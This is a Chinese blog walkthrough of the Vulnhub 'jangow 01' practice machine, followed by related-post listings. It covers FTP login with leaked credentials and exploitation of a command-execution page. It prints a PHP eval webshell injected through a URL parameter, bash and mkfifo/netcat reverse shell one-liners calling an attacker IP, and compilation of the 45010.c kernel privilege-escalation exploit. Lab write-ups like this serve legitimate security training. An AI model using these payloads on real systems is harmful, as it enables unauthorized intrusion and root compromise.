靶机练习 No.20 Vulnhub靶机 jangow 01 ftp登录 命令执行写入webshell php反弹shell 45010.c内核漏洞提权

已于 2022-02-11 11:12:17 修改
阅读量3k 收藏 3
点赞数 1
分类专栏: 靶机学习 文章标签: 安全 web安全 linux
于 2022-01-20 18:44:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/122595867
版权

0x00 环境准备

  • 下载链接

    https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

  • 靶机介绍
    难度:简单

    上架时间:2021年11月4日

    提示信息:The secret to this box is enumeration! Inquiries jangow2021@gmail.com

  • 靶机配置
    virtual box 启动,与kali配置同一网卡。

0x01 信息收集

  • 靶机ip探测
    在这里插入图片描述

  • 端口服务识别

在这里插入图片描述
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4

0x02 漏洞挖掘

思路一:80端口web漏洞挖掘

枚举目录,源码等寻找信息。手工+扫描器寻找漏洞,

思路二:ftp寻找账号密码登录

找到疑似账号密码的,用ftp登录。

步骤一:扫描器枚举目录及网站漏洞

(1)dirsearch 扫描目录

在这里插入图片描述

(2)appscan 扫描网站漏洞

在这里插入图片描述
在这里插入图片描述

发现

  1. 一个.backup 目录
  2. /site/wordpress目录
  3. 源码中有 hello@yourdomain.com 邮箱信息
  4. busque.php有一处传参点

步骤二:看.backup目录

为数据库连接配置文件, 有数据库账号密码

jangow01 abygurl69 可用来后续 wordpress登录和ftp登录
在这里插入图片描述

步骤三:尝试ftp登录发现并下载源码

以发现的账号密码登录
发现html 文件 在ftp服务器上 可以下载。
下载源码 分析有没有可以利用的点
在这里插入图片描述

步骤四:分析busque.php源码利用

(1)分析源码

很明显一个命令执行的小马
在这里插入图片描述

(2)利用

有回显
在这里插入图片描述

(3)收集其他信息

在 /home/jangow01目录下 发现一个user.txt文件
在这里插入图片描述
md5 解密 为空密码

在这里插入图片描述

(4)反弹shell(失败)

bash -c ‘exec bash -i &>/dev/tcp/192.168.56.137/8888 <&1’

及创建文件后写入 bash反弹shell命令 执行 /bin/bash 运行 均失败。 太菜了。

(5)创建webshell文件蚁剑连接(失败)

192.168.56.118/site/busque.php?buscar=echo ’<?php eval($_REQUEST[1]); ?> ’ > 1.php
在这里插入图片描述

写入成功
在这里插入图片描述
连接失败。
很奇怪为什么,明明写进去了,也能访问到蚁剑 却连不上。

直到后边到了步骤七了 没进展,又翻回头才
发现 原来是 蚁剑开着代理 忘记关了, 难怪连接不上。晕。

步骤五:ftp 下载wordpress 目录下文件

(1) 下载config.php
又发现一个账号密码 desafio02 abygurl69
在这里插入图片描述
(2)ftp 又以该账号密码访问 失败
在这里插入图片描述

步骤六:测试wordpress目录

(1)wpscan 扫描
发现 只是目录名字命名为wordpress
其实并不是WordPress
在这里插入图片描述

步骤七:蚁剑重新连接写入的webshell

发现 蚁剑代理忘关了,所以步骤四中 蚁剑才连接不上webshell
这次连接成功
在这里插入图片描述
在这里插入图片描述

步骤八:www-data 网站权限信息收集

(1) cat /etc/passwd

/bin/bash 的shell的只有 jangow01 和root 账号
在这里插入图片描述
没有其他可以利用的点了

步骤九:反弹shell

经测试 该靶机 可以访问 其余ip的443端口。 其他端口不可访问。

(1)php反弹shell

蚁剑在网站目录下创建你如下文件 3.php

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.137 443 >/tmp/f');?>

在这里插入图片描述
在这里插入图片描述

(2) 通过webshell上传msf php木马到靶机

在这里插入图片描述

0x03 提权

步骤十:尝试内核漏洞提权(成功)

(1)python命令切换

python3 -c ‘import pty;pty.spawn("/bin/bash")’

在这里插入图片描述

(2)版本内核信息收集

uname -a
lsb_release -a

在这里插入图片描述

(3)在exploit-db库搜索下载相关版本提权漏洞

searchsploit ubuntu 16.04

在这里插入图片描述
在这里插入图片描述

(4)通过蚁剑上传至靶机

在这里插入图片描述

(5)尝试44298.c exp提权(失败不存在该漏洞)

gcc 44298.c -o exp1
chmod +x ./exp1
./exp1

在这里插入图片描述

(6)尝试45010.c exp提权(提权成功)

gcc 45010.c -o exp2
chmod +x exp2
./exp2
在这里插入图片描述
在这里插入图片描述

0x04 总结

本次靶机比较简单,只开启了21和 80端口根据提示枚举目录 用dirsearch枚举出一个数据库备份文件,本着一码多用的原则,利用数据库账号密码登录ftp成功。下载下网站源码,发现一处可以执行系统命令处,写入webshell,再写入php代码反弹shell,靶机账号中存在jangow01,又用那个密码 www-data ,su jangow01 切换账号成功,又在exploit-db 库中 搜索到ubuntu 16.04的内核漏洞 以45010.c exp提权成功。

LuckyCharm~
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
jangow-01靶机全过程(超详细!)
qq_68868384的博客
08-09 190
使用nmap进行全网段大致扫描-sS:半开放扫描,扫描时不完成tcp的连接,这样可以使扫描更加隐蔽且更快-T4:paranoid (0), sneaky (1), polite (2), normal (3),侵略性(4)和疯狂(5)。前两个是为了逃避IDS(入侵检测系统)。礼貌模式减慢扫描速度以使用更少的带宽目标机器资源。正常模式是默认的,所以-T3什么也不做。侵略性模式将扫描速度提高到假设您在一个相当快速和可靠的网络上。
Vulnhub靶机jangow-01-1.0.1
qq_48904485的博客
01-03 423
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机jangow01(10.0.2.4)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/
HTB_Appointment 靶机登录框万能密码、sqlmap post 注入
网络安全学习
04-22 3744
⚔ 🧱 YOU NEED TO WALK BEFORE YOU CAN RUN 🧱⚔ 文章目录先放答案万能密码注入sqlmap post 注入测试是否存在注入查数据库查表查列查数据 先放答案 因为这期问题都比较简单,简单到我想不到讲什么把它们串到一起,索性就直接放答案了 Structured Query Language SQL Injection personally identifiable information A03:2021-Injection Apache httpd 2.4.38 ((.
靶机练习 No.24 Vulnhub靶机hackable-ii ftp匿名访问+上传马+网页运行 反弹shell sudo python3.5提权
YouthBelief的博客
02-16 2687
靶机练习 No.24 Vulnhub靶机hackableII0x00 环境安装0x01 信息收集步骤一:ip探测步骤二:端口服务识别0x02 漏洞挖掘思路一:ftp 匿名访问思路二:80 http服务挖掘思路三:ssh爆破步骤一:ftp匿名访问(成功)(1) 匿名登录(2)查看内容步骤二:80http探测(1)访问首页(2)查看源码 有没有隐藏信息(3)目录扫描(4)查看files页面步骤三:ftp上传马(1)查看ftp是否拥有写权限(2)上传 kali自带的php反弹shell的马(3)kali开启监听,
dc-1 靶机渗透学习
..
03-11 3067
环境: Vmware 虚拟机软件 dc -1 靶机ip地址:192.168.202.130 kali攻击机ip地址:192.168.202.129 本次渗透过程kali攻击机和dc靶机都采取NAT模式 信息收集 首先用ipconfig查看当前kali机所处网段。 得到当前kali机的ip地址后,用nmap对当前网段进行扫描,主机探活。 nmap超详细使用教程_Kris__zhang的博客-CSDN博客_nmap使用教程 nmap -sP 192.168.202.0/24 .
Nmap网络扫描器实验
Fright-Moch的博客
05-09 6570
网络入侵的一般流程是确定目标、信息收集、漏洞挖掘、实施攻击、留下后门、清除日志。在信息收集环节又可分为网络踩点、网络扫描和网络查点。在网络扫描部分,按照攻击者的入侵流程又可分为主机扫描、端口扫描、系统类型探测和漏洞扫描。 网络扫描是针对整个目标网络或单台主机,网络扫描可以全面、快速、准确的获取目标系统的信息;通过网络扫描发现对方,获取对方的信息是进行网络攻防的前提。至今,互联网上有许多开源的优秀网络扫描工具,Nmap(简称Network Mapper)就是世界上最流行功能、最强大的网络扫描工具。
ftp服务后面漏洞——CTF靶机
panda.
10-24 324
使用metasploit平台扫描查看有无漏洞。使用nmap工具扫描靶机查看端口开放状态。渗透到靶机,并且权限是root权限。首先使用fping扫描靶机ip。发现有漏洞,使用漏洞并配置参数。扫描21端口服务版本信息。
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
HTB_Fawn 靶机FTP 协议简介
网络安全学习
04-18 1226
🍭 不要焦虑也不要放弃,每天进步一点点 🍭 文章目录FTP 简介如何使用? ps:填空答案已在文中标出 FTP 简介 FTP 文件传输协议( File Transfer Protocol [1] )是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输而不是 UDP,它有两个开放端口,一个是控制端口,一般为 21,一个是数据端口,主动模式为 20,也可以由客户端和服务器商议协定,而 sftp [5] 则是相较于 ftp 更为安.
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞
qq_58018041的博客
04-22 3120
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
入门渗透:FTP入侵——Fawn
栉风沐雪的博客
01-31 1638
入门渗透:FTP入侵——Fawn,使用的是hackthebox靶机。小技巧:可以通过搜索引擎查找csftpd 3.0.3出现的CVE漏洞等,一般最新的服务漏洞不会曝光,但是如果不是最新版本,可以查找相关的漏洞,使用msf的模块进行渗透。遇到没有进行加密的ftp一般运行于21端口,此处靶机为简单的ftp服务。使用的是hackthebox的Fawn靶机
最新Apache漏洞分析
二狗的博客
12-30 1730
2021年9月16日,Apache官方发布了Apache httpd mod_proxy SSRF漏洞CVE-2021-40438,影响v2.4.48及以下版本。该漏洞影响范围较广,危害较大,利用简单,不得不引起重视。该ssrf代理访问漏洞适用于apache的绝大多是版本,相对来说漏洞原理比较简单,隐藏了多年也是很不容易了,至于危害的话,笔者认为危害还是挺大的,可以访问到服务器内部一些不对外开放的http端口及uds文件。
Ubuntu 16.04特定内核提权复现(CVE-2017-16995)
sGanYu
07-17 931
Ubuntu16.04版本存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPFbpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题,攻击者通过普通用户权限可以利用该漏洞进行提升至高权限用户,获取root权限,目前,主要是Debian和Ubuntu版本受影响,Redhat和CentOS不受影响。进入/tmp目录,将linux-exploit-suggester-2.pl传输至tmp文件夹。通过Xftp建立远程连接,用户名hack,密码123456。...
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 995
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权
如何安全可控的进行跨区域数据交换,提高数据价值?
最新发布
文件数据安全交换
04-30 912
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值